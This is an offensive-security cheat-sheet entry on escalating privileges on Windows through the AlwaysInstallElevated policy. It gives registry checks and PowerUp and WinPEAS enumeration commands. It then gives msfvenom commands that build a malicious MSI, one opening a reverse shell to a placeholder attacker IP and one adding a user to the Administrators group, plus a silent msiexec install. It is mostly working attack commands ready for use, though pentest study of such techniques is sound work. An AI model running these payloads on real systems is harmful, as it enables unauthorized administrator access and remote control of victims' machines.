AlwaysInstallElevated

Manual verification of the activation of this parameter is very simple and can be done with two commands. If it is enabled, it will create the value AlwaysIntstallElevated and set it to 0x1 (enabled) on the following two registry keys.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Alternatively, using PowerUp from Powersploit we can enumerate the AlwaysInstallElevated policy.

. .\PowerUp.ps1
Invoke-AllChecks

Alternatively, using the systeminfo module of WinPeas

winPEASx64.exe systeminfo

We just have to generate a malicious MSI file and install it with msiexec.exe

Generate a malicious MSI

# Reverse Shell
v4resk㉿kali$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f msi > package.msi

# Add user to Administrators
v4resk㉿kali$ msfvenom -p windows/exec CMD='net localgroup administrators <YOUR_USER> /add' -f msi > package.msi

Then, after downloading it to the target, install the MSI file using msiexec

msiexec.exe /quiet /qn /i package.msi